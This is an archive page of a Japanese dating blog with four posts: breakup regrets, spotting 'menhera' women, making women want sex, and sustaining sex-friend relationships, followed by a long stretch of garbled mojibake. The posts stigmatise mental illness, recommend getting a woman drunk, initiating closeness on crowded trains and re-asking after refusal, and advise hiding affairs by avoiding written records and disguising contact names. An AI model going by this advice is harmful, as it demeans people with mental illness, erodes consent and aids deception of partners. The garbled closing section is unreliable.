2017年 11月 の投稿一覧

元カノと別れてから後悔したと思う7つの出来事

ふとした瞬間に、元カノのことを思い出すことはあるかと思います。

あー。あいつと別れなければよかった。」と後悔することも経験している方は多いと思います。

後悔しても戻ってくるわけではないかもしれませんが、別れてまだ時間がた経っていない場合は、特に思い出しやすいのではないでしょうか。

では、どのようなときに元カノを思い出すか?
今回は、別れて後悔した出来事を見ていきたいと思います。

元カノの最近を知ってしまう

SNSから知ってしまう



現在たくさんのSNSがあります。元カノとフォローし合っている方も多いと思います。

別れたのに元カノの近況を知っていしまうのは、嫌なものですよね。

別れたことにより少なからず時間ができてしまうものです。
SNSを開く場面も増えてしまうと考えられます。

そんなときに元カノの楽しそうな写真など載せていたら最悪ですね。

男性からしてみれば、「おれのことそんな簡単に忘れてるのかよ」など憤りを覚えるかもしれません。

SNSはコミュニケーションツールとして必要な時代です。

彼女と共有すれば、そのときは楽しいことかもしれませんが、後々のことを考えれば共有しすぎるのは良くないのかもしれません。

これはフォローする、こっちはフォローしない」など限定して共有するのが良いでしょう。

他の男性との交際を知る

SNSのところでも言いましたが、近年はどんな情報も知る可能性があります。
元カノに彼氏ができた事実を知ることもあるでしょう。

これは別れ方にもよりますが、別れてからの期間が短ければ短いほどショックでしょう。
いずれ彼氏ができてしまうとわかっていても男性が受けるダメージは大きいものです。

女性は男性と別れた後の感覚が違うので、男性を上書きして考えることができます。
男性は女性を別フォルダに保存するような感覚なので、分かり合えないところかもしれません。

元カノも次に進むために努力をするでしょうし、それを止めることはできません。

後悔をする前に、自分から行動しなければならないこともあるかもしれませんね。

ばったり再開する

地元が一緒だったり、共通の友だちが多かったりしたら、元カノとばったり会ってしまうことも考えられます。

そろそろ忘れられてきたときなどは、タイミング的に会いたくないものですよね。

学生時代の元カノなら、同窓会などの集まりであってしまう可能性は高いと言えます。
心の準備ができるときは、ある程度覚悟を決めておくと良いでしょう。

たまたま会ってしまった場合は、仕方ありません。スマートに挨拶をしてみるのも良いかも知れません。

しかし、仮に他の男性が一緒にいたら、知らない人のふりをしたくなりますね。

こういった場面では諦めが肝心かもしれません。潔く次の恋を見つける準備を急ぐのもひとつの手でしょう。

いなくなった事実を再確認したとき


頻繁に取っていた連絡がなくなる

彼女とは毎日連絡を取っているという方は、少なくはないと思います。

毎日何通、何十通送っていたメールやLINEが一切なくなってしまったら、変な感じを覚えるかと思います。

さっきまで彼女の状況が、いつでもわかる環境にいたのになくなってしまうと、理解していても寂しいものですよね。

友人や家族ではそこまで連絡をとりあっていないと思います。
彼女ほどマメに連絡をとっていた相手はいないはずです。

連絡を取らなくなって空いた時間が増えたら、友人と出かけたりなどできる限りで埋めてみましょう。
少しは気が晴れるかも知れません。

同棲していて荷物がなくなっていく

同棲していて別れてしまうことも多いかと思います。

同棲していると元カノの荷物も多いでしょう。女性ですし、クローゼットの中などは元カノのものがいっぱいでもおかしくないでしょう。

いざ別れて出ていくとなったら、家具や荷物がたくさんあった部屋がすかっらかんをいうことも考えられます。

歯ブラシがなくなっていたときや、ペアのマグカップの片方を持っていってしまったときなど感慨深いものがあるのではないでしょうか。

そうなってしまうと、寂しいものですよね。
一気に後悔の念が押し寄せてきても、おかしくはありません。

せっかく一緒に住むところまでいったなら、なるべく別れるということはなしにしたいですね。

元カノとの思い出を想い出したとき


今カノと比較してしまった

新しく彼女ができ、新しい恋をはじめていたとしても、ふとした瞬間に元カノは頭に現れるかもしれません。

今カノに何の不満もなければ良いのですが、ひとつの不満もないというのは少ないはずです。

そんなときに頭をよぎるのは元カノの存在です。比較してしまうのは、ダメとはわかっていてもしてしまうものです。

元カノはここがよかったな。」、「元カノはあれができたな。」など思うことがあると思います。

今カノと良好な関係を育めていても、元カノの存在はすぐ忘れてゆけるものではないでしょう。
別れてからの期間が短ければ、尚更ですよね。

今カノがあまり好みではなかったときには、元カノとの良い思い出が後悔を呼び起こすかもしれません。

元カノと別れて後悔したとしても、今カノの良いところを挙げてみましょう。
今カノとの交際を前向きに考えることで、元カノの後悔など引き飛ばすことができるかもしれません。

思い出の場所

元カノといろいろな場所に行ったと思います。良く使っていたお店などは、別れても使うことがあるかもしれません。

そのようなときに、元カノと一緒に来た楽しい思い出など、呼び起こされてしまうでしょう。
楽しかった思い出があればあるほど、今いない現状に後悔するかもしれません。

別れてからすぐは、思い出の場所に行くのは極力避けたいものですね。

まとめ

今回は、元カノと別れて後悔した出来事を挙げてみました。

男性は元カノを忘れることは難しいと言われています。なので、元カノの記憶と上手く付き合っていけるように努力が必要かもしれません。

女性は、意外とあっさり次の恋をすることができます。見習う必要はないとは思いますが、いつまでも未練を持っていると時間がもったいないかもしれませんね。

別れてしまったら悩まず、旅行に出かけたりして気分転換を図ると良いでしょう。
まずは自分の気持ちをリセットすると、もしかしたら後悔せずに前へ進めるかもしれません。

【覚えておこう】メンヘラ女性を見分けるための5つのテクニック

まずは、【メンヘラ】って何?と思ってらっしゃる方も多いかと思います。

「メンタルヘルス」つまりは「心の健康」そして「心に病気を抱えた人」について使われる言葉として扱われるようになったのです。

今の時代、バンドの歌詞とかにも使われているくらい世に渡っている言葉ですよね。

そこで今回は、お付き合いする前に判断しておきたい貴方に【メンヘラ女性】の見分け方をいくつか紹介していきたいと思います。

SNSの更新頻度が多めな女性

最近では、インスタグラムやツイッター、フェイスブックなどさまざまなSNSでその方がどこに行ったのか、など把握できる時代になっていますよね。

そんな中で、例えば「ありえない。うざい。死んでほしい。」など誰のことかわからない愚痴が多めだったり、「死にそうなくらいお腹痛い」などを呟いていたり「やばいんだけど。」熱が高い体温計の写真や、点滴中の腕の写真などを載していたり「救急車呼ぼうかな」とケガをした血まみれの写真を載していたり、他人からするとどうでもいいような内容を1日に10回くらいアップしている方は、要注意です。

基本的に「かまってちゃん」と呼ばれる部類に属しているので、人から構われたい願望が人よりかなり多いため、SNSを利用して「私を心配して」というようなことを遠回りにアップしているのです。これは、周りからすれば面倒くさいし、疲れますよね。

それに構えば構うほどエスカレートする傾向がありますので、放っておくのが1番の解決策でもありますし、早めに見極めておきましょう。

仕事が長続きしない女性

基本的に人間関係を上手に築けないので、生活の基盤である仕事でさえも人間関係を理由に辞めてしまうのが【メンヘラ】の方たちではないでしょうか。

メンヘラでない場合なら、仕事は仕事。と割り切れる方が大半だと思いますが、仕事中も人間関係のことばかりで頭がいっぱいになってしまい、後に無断欠勤や仮病などを使い始め、仕事に来なくなります。

そういう女性は、飲みに行ってもカフェに行っても職場の愚痴を口にします。誰でも仕事の愚痴はこぼれますが、そんなもんじゃありません。口を開けば他人の評価でけなす以外は口にしない傾向が。自分が1番仕事ができると思っているかのような口ぶりで。

こういうメンヘラ女性は、例えば友達が「今日の仕事かなり疲れたわ~」などと言うと「〇〇ちゃんはいいじゃん~。そんな仕事でお給料もらえるんだから~私なんか….」と自分が1番しんどいとでも思っているのか、このような発言も平気でしてしまうのです。

そのわりに、気に入らないことがあると上司や周りのせいにして、すぐに仕事を辞めてしまう自分勝手な女性です。周りもなかなか振り回されるので早めにメンヘラだと見極めて対処しましょう。

相手に対し異常な束縛をする女性

彼氏や旦那に対して異常な束縛をする女性は要注意です。飲み会や同窓会だけにとどまらずにどんな時も相手を束縛し続けます。

それは一種の不安からくるみたいですが、さずがに限度を超えてしまうと疲れてしまうし、「信用されてないのかな」など男性側もしびれをきらしてしましますよね。

そもそもメンヘラによくありがちなのが、自分に自信がないということ。自分に自信がないために、相手からどう思われているか不安で不安でたまらなくなるようです。自分に自信がないから自分を好きになれず、他人の評価ばかりを気にして自分らしささえ無くしてしまっているのではないでしょうか。

もうそうなったら生きているだけでしんどくなってきて悪循環でしかないですよね。こういう女性は、意外と付き合うまではメンヘラな自分に気づいていないパターンもあります。付き合って何か月か経過したころから次第にメンヘラ化してくるのです。それまでは、無意識にネコをかぶっているのでしょう。手遅れになる前に、付き合う前にはメンヘラチェックをしていた方がいいかも知れません。

メンヘラ女性は、別れ話をさせてくれない、もしくはしつこく拒んできますのでなかなか別れてくれないし「貴方と別れるくらいなら死んだ方がマシよ!」なんて事にもなりかねませんので、面倒なことになる前にしっかりと見極めるテクニックを磨いておきましょう。

いろんな薬に頼りがちな女性

何かにつけて薬を飲もうとする女性で、さらにそれを異常な程にアピールしてくる女性です。

例えば「最近、眠れないから睡眠薬飲んでるんだ~」「胃が痛いから空腹だけど胃薬飲む!」など、ふと周りが聞けば「え?大丈夫なの?」と心配してしまうようなことを発言したがるんです。まるで「私、薬に頼るのが好きなんだ」とでも言いたいかのようです。そういう場合に、こちら側が心配すると嬉しそうに「大丈夫。仕方ないから」などと言ってニコニコしています。そのうち大量摂取とかをしたがったりと、とことん周りに心配されたがります。親から愛情を受けつつも受け方を間違えているのか、どこかで誰かに心配されないと自分が誰からも相手にされていないんじゃないかと不安になるようです。

そんな方は、付き合ってからも「私のことどのくらい好き?」などとしつこく聞いてくる可能性も否めません。そうなる前にしっかりと自信をつけてあげるのも1つの方法かもしれません。言葉や態度でしっかりと愛情表現をしてあげてください。それが、その女性にとっては1番の不安解消になるんだと思われます。

見た目の割に意外にもすぐ抱ける女性

第一印象としては、性格がきつそうでサバサバ他人に意見するような感じの女性で、男性にも困っていなさそうな方っていますよね。

そういう女性はだいたいプライドが高い方か、意外にもすぐ抱けちゃうような方と2パターンの女性に分かれた時に、後者であった場合メンヘラ女性の可能性が高いです。

というのも、そもそも自分に自信がなく周りの評価や印象をどうしても気にしてしまうので「ここで断ったら嫌われちゃう」など変な勘違いをしてしまいがちなのです。抱かれることでこの男性に私は想われているという感覚で色んな男性に抱かれがちです。

その後も全く後腐れがないメンヘラ女性と「なんであの時私を抱いたの?」など質問攻撃をしてくるメンヘラ女性がいるので、男性は気をつけたいところですよね。

そんな面倒なことになってしまう前に気がないなら連絡をとれない状態にしておくとかワンナイトラブであることもハッキリ伝えておく方が今後のお互いのためでもあります。何にしてもメンヘラ疑惑がある女性とは寝ない方がより無難な気もしますね。どうしてもという時は、前もって体だけの関係で居たいことを事前に伝えておくようにしておきましょう。

まとめ

こうすると、やはり【メンヘラ女性】とは基本的に面倒くさい印象のような気がします。

見分けるために磨いておいた方がいいテクニックというよりかは、特徴を捉えておいてなるべく対処できるよう構えておくのも1つの方法かもしれませんね。

貴方の周りにも意外とあてはまる女性が多かったりしませんか?最近の女性だけに限らず【メンヘラ】ちっくな方は多い気がしますので、自分も面倒くさい人間にならないよう日頃から気を付けていきたいものですね。

【エッチしたい!】女性があなたとSEXしたくなる6つのテクニック

最近では、SEXに対して積極的な女性も増えてきたように思います。
男性と同じように女性にも性欲というものがありますし「今日どうしてもSEXがしたいの」そんな日もあるものなのです。
そこで今回は、女性は、こんなことされるとSEXしたくなっちゃうという言動や、行動をいくつかご紹介していきたいと思います。

ソフトボディタッチ



これはカップルや夫婦、そうでない体だけの関係などの場合に共通して言えることなのですが、意外にもガッツリなボディタッチよりもソフトなボディタッチの方がエッチしたくなりやすいのです。
というのもSEX中もそうなのですが、いきなりガッツリ攻められるよりかは、こしょばいくらいで焦らされてからの方が数倍気持ちいですよね?これをフェザータッチとも呼ばれていたりします。

これがまた、お家デート中でDVDを見ながらだったり、ドライブデート中の車の中なら意識しちゃいますし、ムラムラしてしまう女性も多いです。「ちょっとやめてよ~」などと言いながら、内心はイチャイチャしたくなってきているに違いありません。特に脇腹や、耳など少し恥ずかしい部分をソフトに触ってあげることで女性の体は熱くなってきてしまいます。

耳元で呟く”耳つぶ”

普通に会話できる内容を、あえて耳元に近づき囁くように言ってあげたり少しいやらしい会話を耳元でするだけで女性は興奮しちゃいます。なかなか公共の場ではしにくいですが、少しザワザワした場所だとチャンスです。女性に近づき、耳元で会話してみましょう。

映画館など少し暗がりな場所だとなお効果的ともいえるでしょう。大勢でカラオケなどに行った時も、その女性にだけ聞こえる声で「今日カワイイね。」など褒めてみたり「なんか少しスカート短くない?他の男に見られたいの?」とかSっ気のある言葉でもいいかも知れませんね。

ただし、これはお互いに思い合っている場合に限られます。どうでもいい人からされてもなんとも思わないしむしろチャラい奴だなと軽蔑されてしまいますので、あくまで相手と関係がある場合に限ります。

予想外の”近キョリ”

例えば、想像しやすいものでいうと、満員に近い電車の中などですかね。ガタンッと揺れた拍子に女性側へかなり近づくようなイメージ。いわゆる”壁ドン”のようなものです。その後は耳元で「近いね。ドキドキする」など小声で呟くと女性の鼓動は早まります。

その他のケースだと、何か物を取る時などあえて女性を挟んだりして自然に近づいてみましょう。
少しドキッとした素振りなどをしたら微笑みかけたりなどして意識させることが大切です。

後は、エレベーターなどで人のいない時に後ろからハグしてみましょう。「誰か来るかもしれない」ドキドキ感に気持ちは高まります。いつもと違うあなたを魅せてキュンとするに違いありません。

デートのムード作り

昼間は、遊園地や映画館にお買い物などアクティブにデートしたりしますよね。お外デートの場合、肝心なのはデート終盤です!夜に近づくにつれて、ムードをより大切にしていきましょう。食事に選ぶならガヤガヤした居酒屋さんのようなお店は控えるようにして居酒屋さんでも少し落ち着いた雰囲気のあるお店にしてみましょう。

女性が「今日は、少し酔いたいな」なんて気分にさせれるかがこの日の大きなポイントとなるのです。この食事が終わった後に、楽しい時間を過ごせるように女性を少し酔わせてあげましょう。
お酒の力を借りていつもより少し大胆になる女性も、少なくはありませんので期待したいですね。
ただ、ここで注意することは悪酔いしないように女性のペースをしっかりと考えてあげてください。万が一、酔いすぎて気分が悪いだの吐いてしまうだのしてしまったらせっかくのデートなのに可哀想です。

この後のことばかり考えずに、焦らずゆったりとムード作りをすれば女性も貴方に身を任せてくることでしょう。ところどころで「お酒のペース、大丈夫?」「〇〇ちゃんのペースでゆっくり飲んで大丈夫だよ」などと優しい声掛けも忘れずにしてあげると更に、好感度アップかも知れませんね。

夜のピロートーク

ピロートークとは、ベットインしてから落ち着いた状態で話すことを言います。夫婦間に留まらず最近は、カップルの間でも「セックスレス」に陥ることもあるのだとか。そんな方達にもオススメです。

いつも通りベットに入ったあと、何気ない会話から始めてみてください。最近の仕事や友達関係の話だとか、最近食べた美味しいものの話など、なんでもいいんです。男性は割と女性の話はつまらなく思う方も多いと思いますが、女性は好きな男性に話を聞いてもらえるだけで安心するものなのです。

ピロートークをして、少しずつ心を開いてきた女性に改めて日頃の感謝や容姿や内面について褒めてみましょう。この時注意すべきことは「あくまでも、自然に。」ということです。そうすると、SEXに誘ってみても自然な流れで貴方に身を任せてくれることでしょう。

可愛いスキンシップ

先ほど紹介したのは”ソフトボディタッチ”ですよね。これは”スキンシップ”です。そもそもスキンシップとは、「肌と肌の触れ合いによって親近感をはぐくむこと」です。これは、お外デートには向かないですが、お家でのお泊りデートや、同棲中のカップル、それから夫婦関係の方たちに向いているといえますね。

お家の中で二人でDVDを観ている時にぴったりとくっついたり、膝枕をしてもらうのもいいですね。後は、女性がキッチンで用事をしている時などに後ろから抱きついて肩にアゴをのせてみたり。外では出来ない「女性に対して可愛くスキンシップ」をしてあげると、女性には母性本能というものがあるのでたまらなく愛おしくなります。

普段ツンツンしている男性や、口調の荒い男性などは特にギャップがあり、女心を揺さぶります。男性からのスキンシップに女性もドキドキ、キュンキュンしますし、そこからキスをしたりしながらSEXまでの雰囲気を作ってあげましょう。

まとめ

どうでしたか?男性と違って女性はSEXの雰囲気は大切にしたいものなので、焦らずにゆったりとムードを作っていくように心掛けましょう。

断られても、懲りずに日をあけて誘ってみましょう。女性は気分屋なので、SEXに対する気持ちの波があります。その波を見極めるより、このテクニックを使えば貴方のペースでSEXができるようになりますよ。

セフレの関係を長続きさせるあために絶対すべき6つのコト

セフレの関係性にもさまざまな形があるのですが、ダブル不倫、片方が既婚者で片方が独身など。どちらもフリーではあるが、お付き合いは体だけなど。

どの関係性にも共通して言えるのは、その相手には体だけを求めている。それがセフレの定義。
その関係を長続きさせるためにはどうすれば良いのかを一緒に考えていきましょう。

お互いに干渉し合わないこと

相手に奥さんや旦那さん、彼氏彼女が居ても居なくてもセフレを干渉してはいけません。というのもお互い割り切った関係性に落ち着いているのですから、わざわざ毎朝メールや電話をする必要性はありませんし、誰とどこで遊ぶかなども知る必要がありません。

例えば、街中でセフレが異性と歩いていた場合も友達のフリをするなどしてプライベートには踏み込まない方がいいでしょう。自分はセフレであり本命ではありません。決して勘違いしてはいけません。
万が一、どちらかが恋愛感情を持ち始めてきてしまえばすぐに関係を辞めるなりした方がいいでしょう。

SEXをしたくなれば、連絡を取るくらいがちょうどいいのです。あまりにもしつこく連絡をしてしまうと、この関係性の意味がなくなってきてしまうのです。気持ちい関係のまま居たいのなら程よい距離を保ち、相手を干渉しないことが大前提といえるでしょう。

SEX中は貴方の虜にすること

相手に奥さんや旦那さん、彼氏彼女が居る場合に多いのが罪悪感で関係を辞めてしまうこと。そんなことになってしまったら寂しいですよね。せっかく体の相性が良いのに手放すなんて勿体ないので、なるべく罪悪感を持てせないように心掛けてあげましょう。

SEX中には、なるべく色んなことを褒めてあげたり「〇〇とSEXできて幸せだよ」「〇〇との時間がずっと続けばいいな」などとベットの上では愛を囁くようなこともたくさん言って特別な時間にしてあげましょう。そうすることで奥さんや旦那さん、彼氏彼女が居る相手でも「この人とのSEXは辞められない。」と虜になってきてしまうのです。

セフレなんてダメだと分かっていても、実際は旦那さんや奥さん、彼氏彼女では味わえないSEXを楽しむこともできたり、新しい自分を発見したりとプラスな関係になっている場合もありますよね。
あくまでセフレなので、その先はない。ということは忘れずに長続きさせて楽しみたいものですね。

アフターケアを大切にすること

実際に行為が終わった後は、お互いの処理を手伝いながらお互いの下着を取り合って一緒にシャワーへ向かい、体を洗ってあげたり。とにかくSEX中よりもアフターケアを入念にしてあげましょう。一緒に過ごす時間は常に相手を思いやり、行為が終わったからと言ってすぐに帰るのはNG。出来る限りゆったりと過ごすように心掛けていきましょう。そうすることでお互いに体も心も満たし合えてよりいい関係になっていきます。

後は、SEX以外でその人と会うことがある場合は周りが見てない場面でこっそりと「この間はありがとう」など感謝を伝えたり、少しくらいのボディタッチもしといてあげましょう。相手に対して体だけの関係だから適当にあしらっているように思われないようにしておくこと。体だけの関係とはいえ、大切なパートナーである意識を常に持っておきましょう。

セフレは少人数にしておくこと

たくさんの男女と関係を持つ方が良いと思うかたもいますが、時間とコストが掛かってしまいます。
ホテル代など、何人もセフレが居れば相当かかってきてしまいますよね。できれば低コストで抑える方がよいのではないでしょうか。

その他にも複数セフレが居ると、その相手同士で繋がっている可能性もでてきたりします。街中でばったり会って気まずい思いをしたり、男性はセフレに対して抵抗が少ないためにペラペラと「俺セフレいるんだ~」などと話題にしている場合もあります。それに比べて女性は、そういう関係の男性が居ることは周りに話すことはあまりありませんので、万が一周りにバレてしまえばセフレの関係を切りたがります。

しっかりと秘密の関係にできて、信用のできるセフレが一人いれば充分ではないでしょうか。
それに複数いると一人一人に対して適当な対応にもなってしまいがちなのでなるべく一人のセフレを長く大切にする方が効率もよさそうですね。

既婚者や恋人がいる人を選ぶこと

実際に長続きするセフレ関係は、お互いに本命が居るパターンではないでしょうか。やはりフリー同士や独身同士だと、どちらかが恋愛感情を持ってしまって面倒くさいことになってしまうので壊せない関係がある人。つまりは不倫や浮気の方が長続きするということです。

男性も女性も、嫉妬心に駆られてSEXが普通よりも燃え上がるなんてことも。行為をしながら「旦那さんと僕どっちが気持ちいい?」「彼女はこんなことしてくれる?」などお互い攻め合うこともいいですよね。悪いことをしている罪悪感や、非日常な関係を楽しむ男女も少なくないのではないでしょうか。

ここで注意したいのは、不倫や浮気の場合、なるべくメールや文面でのやり取りは避けて電話などで記録に残らないようにしておきましょう。名前も会社の人の名前にするだとかして徹底しておくべきです。本命にバレてしまえばすべて失うことになりますからね。

アブノーマルにも対応すること

旦那さんや奥さん、彼氏彼女が居る相手に限らず、実際は頭の中で色々なSEXがしたいと思っていてもなかなかパートナーに言いづらかったりしますよね。そんなアブノーマルな欲求を開放できるのがセフレのいいところでもありますよね。

普段、実践できないアブノーマルなSEXを恥ずかしがりながらも楽しめる関係は長続きします。例えば、「目隠しされてみたい」などと男性側も実は、攻められるのが好きな人も多いようです。逆に受け身ばかりのSEXに飽きてしまっていて、攻めてみたら意外にも興奮してしまったという女性が多かったりとか。セフレ関係を持つことで新しい自分を発見できたりします。むしろ本命でない分、自分自身を開放できてSEXに対してもいい意味で積極的になれたりします。

下ネタのように話すのではなくお互いに「どんなSEXが好き?」などとサラっと下調べするのもいいかもしれませんね。より相手の隠し持ったエロい部分を引き出せるかが長続きのポイントだったりするのです。

まとめ

どうでしたか?基本的に体だけの関係だからと言って、適当に扱う関係は長続きしません。体だけとはいえ大切なパートナーだということを常に頭に置いておくことでいい関係を築いていけるのではないでしょうか。

あとは、非日常な関係なのでその人としか楽しめないSEXを一緒に体験していくことで絆も深まってくることでしょう。

a???��a??a?�a??a?Ya??c�?a�sa?�a?Ya??a??a��7a?�a?�a?�a�?a?�a??a�?

a?�c��??sa�?a?�a?�a?�a?�a?�a?�a��a??a??a�?a??a??a??a?Ya??a??a??a?�a?�es�?�?a��a��a?�a?�a??a??a?�a?�e��a?�3a??a?�a��a??a??a?Ya??a??a��a�Sa??a?�a?Ya??a?�a��a��a?�a��a?�a?�a??a?�a?�a?�a??a??a��a��a?�a?�a?�a?�a??a??a?Ya??a��a?�a?�a?�e�?a?�a?�a??a??a??a?�a?�a?�a??a?�a?�a??a�?a??a�?c�?a�sa��??�?��a?�e�?a??a?Ya?�a��

a??a��a??a?�a??a?Ya?�a?Ya�?a?�a�Sa�za??a???��a??a?�a??a?Ya??c�?a�sa?�a?Ya??a??a��7a?�a?�a?�a�?a?�a??a�?a��a?�c??a��a?�a??a?�a��

a?�a??a?Ya?�c�?c�Y??�a?�e�?????�?

a??a??a??a��a?�e?Sa??a?�???a��?��a?�a?�?Z?e��a?�a?�e??a��a��c�?e?�a?�a?�a?�a��a�?e��a?�a?�???a??a??a?�e??a?�c?�a?�a?Ya??a??a�?e??a??a?�a?�a?�a?sa??a??a??a??a?�a��?�?c?�a�?a??a??a?Ye?Ya�?a??a��a??a�?a?�???a??a��a??a?�??�a�?a??a?�a�?a?�a��a??a?�a��a?�a?Yc�Y??�a?�a??a?�a?Ya�Sa??a?�a�Sa??a?�a��a?�i?Y
a�Ya??a?�a�?a???��a????�a��a�?a??a??a?�a?�a��a?�a??a?�a?�a?�a��

?��?��a?�a��a??a??a��a??a�????a?�a?�a??a?�a??a?�a?�a??a??a??a?�c��a?�c�Y??�a?�a?Y?��a?�a?�a?sa?�a��a?�a?Ye??a?�a??a�?a?�a?�a??a?�a??a?�a��

?Z?e��a�???�???a??a???��a?�a??c��a??a��a?�a?�a??c��a??a?�?�?a�?a??a?�a?�a?�a?�a?�a��

a???��a��a??a??a?�c�Y??�a??a�?a�?a??a??a?�a?Y?��a??a?�a�Sa?�a??a?�?Z?e��a��??�???a��c??a?�???e��a?�a�Sa??a?�a??????�?a??c�?a?�a?�a?�a�?a?�a�?a��a?�a??a��a?�?��a??a??a?�?�?a?�a?�a�?a�?a?�a?�a?�a?�c�?a?�a??a?�a�Sa�?a??a?�a??100%?�?a?�a�?a?�a?�a??a??a?�a??a??a?�a��

a?�a��a??a?�c�??��a?�a?�a??a??a??a??a?�a��a�?a?�a?�a????�a??a�?a?�a??a?�a??a�?a??a?�a��a?�a��a��a??a??a????�a?�a??a�Se??a??a��a??a??a??c?�c�?a?�a?Y?��a?�a??a��a?�?��e?�a�?a?�a?�a��

?��e?�a�?a?�a??a��a??a?�a�?a?�a?�?��a��a�?a?�a��a?�

?��e?�a�?a?�a??a��a??a?�a�?a?�a?�a?�a��c�?a?�a??a?�c��a?�c�Y??�a?�a��a?�a?�a?Ya??a?�a?Sa?�a?�a?�a?�a��a?Sa?�a?�a??a??a??a��a???�?a?�a??a?�a?�a??a??a?�a��a��a?�a?�a?�a��

a��a?�a�?e?�a??a???��a?�?��a?�a??a��a?�a?�a???�?a�?a?sa?�c��?��a��e�?a��e�?a��a?�??�???a�??Z?e��a?�a?�a�Sc��a??a??a?�a��a?�i??a?�a�?a??a�????a�?a?�a?�a?�a??a?�a��e�?a?�e�?a?�a��c�sa?�a?�a?�a??a?�a??a�????a??a?�a?�a?????c�Y??�a?�a?�a?�??�a��a???��a?�a�?a?�a�?a��a?�c��1a??i??a??e?�a??a?�a��a��a?�a?�a?�a??a?�a�Sa??a?�a��a��

?�?c?�?�?e��a�?c��a�?a?�a?S?��a?�

a?�a??a?�a??a?Ya��e??a?????a??a��a�?e��a?�a?�???a????�????�Ya?�a�?a�?a��a??a?�aY???�cs�a??a?�a??a?�a?sa��a�Sa??a?�a��a?�i??a???��a??c��?��a?�a??a?�a?�a?�?��a��a�?a??e��a?�a?�a??a?�a?�a?�a��a??a?�a��c�?a??a??a?�a??a�????a??a?�a??a��a?�a?�?��a??a?�a��a?�a��a?�a??a?�a??a??a?�a?�a?�????�?a?�a?�a?�a?�a?�a��

a?�a��a??a?�a??c��a??a?�a�?a?�

a??a??a??a?�e?Ya?�a?�es�a?�c��a??a?�a��a??a?�a??a?�a?�a??a?�a?�a�?a??a�?a?????a??a��e��a��a?�a?�a?�a��

e�?a?�a??a�?a?�e?Ya??c��a??a?�a??a??a??a??a?�?��e��a??a?�a?�a�Sa??a?�a?�a?�a��a???�?a??a?�???a??a��e��a��a??a��a?�a�?a??a??a??a??a��a??a?�a??a?Ya?�e??a��a?�a?�a??a?�a??a?�a?�a?�a??a?�a??a?�a?�a?�a??a?�a??a?�c?Za�?a?�a?�a?�e??a��a??a??a?�e?Ya??a�?a��a??a?�a???��e��a??a?�c�?a?�a?�a??a�Sa??a?�a��

a?�a��a??a�?a��1a?�e��a?�a?�a??a?�a??c�?a�sa?�a��c?�e?�a??a??a�Sa??a?�a?�a?�e�?a?�a??a�?a?�e?Ya??c��a??a?�a��a�?a��a??a??a�Sa?�a?�a?�a�?a�?a??a�?a?�a?�e?�e��a��?Z�a?�a?�a?�a?�a?Ya�Sa�????a?�a?�a?se��a��a?�a??a??a��a??a??a??e?Ya??c��a??a��a?�a��a?�a??a?�a?�a?�a??a?�a��a?�i??a?�a��a??a�?a?�a?�c��?��a??c�?a�sc�??��a?�c?�???a?�a??a?�a?�a???��a??a�sa?�a?�a?�a��

a??a??a?�?��?��c?�a?�a?Za??a??a�?a�?a��a?�a??

a�?a??a??a?�a?Ya?�a?�e�?a??a??a??a??a?�e??a��a??a??a?�a??a�?a��a??a�?c?Za�?a?�a?�c?Za�?a?�a?�a�?a??a?�a��e?�a??a?�a?Ya?�a?�a�Sa??a�?a�?a�?a??a��a?�a?�a??e�?a??a??a?�a?�a?�a?�a�?a??a??a?�a??e��a?�a?�a��a??a?�a??a?�a?Se��a�?a?�e?�e��a??a??a�?a??a?�a?�a?�a?�a?�a?�a��

a�???�a??a??a?�a��a??a?�a�?a��a?�a??a�?a?�a?Ya?�a?�a�Sa??a��a?�a�?a??e��a�?a?�a??a�?a??a?�a�?a??a??a��a?�a��a???��???a??a?�a?�a?�a?�a?�a??a?�a??a?�a??a?Ya??a?�c�?a�se????�a��e��a�?a??a?�a��

a�Sa?�?��c�?a?�a�?a??a??a?�a?�a??a?�??�a??a?�a??a�?a�?a��a?�a??a??a??a??a??a��a??c�?a�sa?�a?�a��a??a�?a�?a��a?�a??a??a??a?�a??a??a??a?�a?�a???��a��?��c?�a��a??a��a?�a?�a??a?�a?�a�??��a??a?�a?�a?�a??a??a?�a��

a�?a?Sa��a?�e��a?�a??a?�a??a�?a?�a��?��e�?a?�a��a?�c?Za�?a?�a?�a?�e??a��a??a??a?�a?�a?�a��a�??��e�?a?�a��a?�c?Za�?a?�a?�a??e?�a??a?�e?�a??a��a�?a?�a?�e��a?�a??a?�a??a��a��a��a??a�?a��a???��a??a?�a?�a???Z�a?�a??a?�a?�a?�c��?��a?�a�?c?Za�?a?�a?�a��a�?a?�a�Sa??a??a?�a��a�?a?�a??a??a?�a?�a??a��a?�a?�e?�e��a??e?za?�a��a??a??a�Sc�??�?a��a?�a�Sa��a??a??e��a?�a�?a?�a??a?�a?�?��???a??a?�a??a��a?�a?�a?�a��

e��a�?a???��?�?a??c�?a�sa?�c?�a??a��a??a?�

a?�a��a??a?�c�??��a?�a?�a??a??a??a?�a?�c��a?�a?�a?�a��a�?a??a??a?�a??e��a??a??a��a?�a?�a�?a?�a��a?�a��a?�a??a??a?�a��a?�a??a�?a??c��a?�a?�a��

a��a?�a?�a��a?�a?�a?Sa?�a?�e�?a?�a?�a???��a�?a?�a??a?�a??a?Ya?�a?�?��a�?a?�a?Ya�Sa�??��?��?�?a??a?�a?�a?�a��a?�a��e?�a??a??a?�a??a?Ya?�a??c�??��a?�a??a??a��a�?a?Ya�Sa?�a��a?�a?�a?�a?�a?�a?�a��a?�a�Sa??a?�a??a��a?�a?�a?�a?�a?�a?�a�?a??a?�a??c�??��a?�a?�a��a??a?�a??a?�e?�a?�?��a?�a??a�?a??a?�?��a��a?�a�Sa??a?�a�?a?�a��

a??a�?a??a??e��a?�e�?a?�a???�?a??a?�a��c?�c�?a?�e�?a�?a??a?�a?�a��a???��?�?a?�a?�a?�a??a??a��c��?��a??a?�a??a?�a��a?�i?Ya�?a?�a?�a��a?�a??e�?e��a?�a?�a�?a??a��a?�e?�a?�e??e?za??a?Ya??a?�a�Sa??a?�a��a��

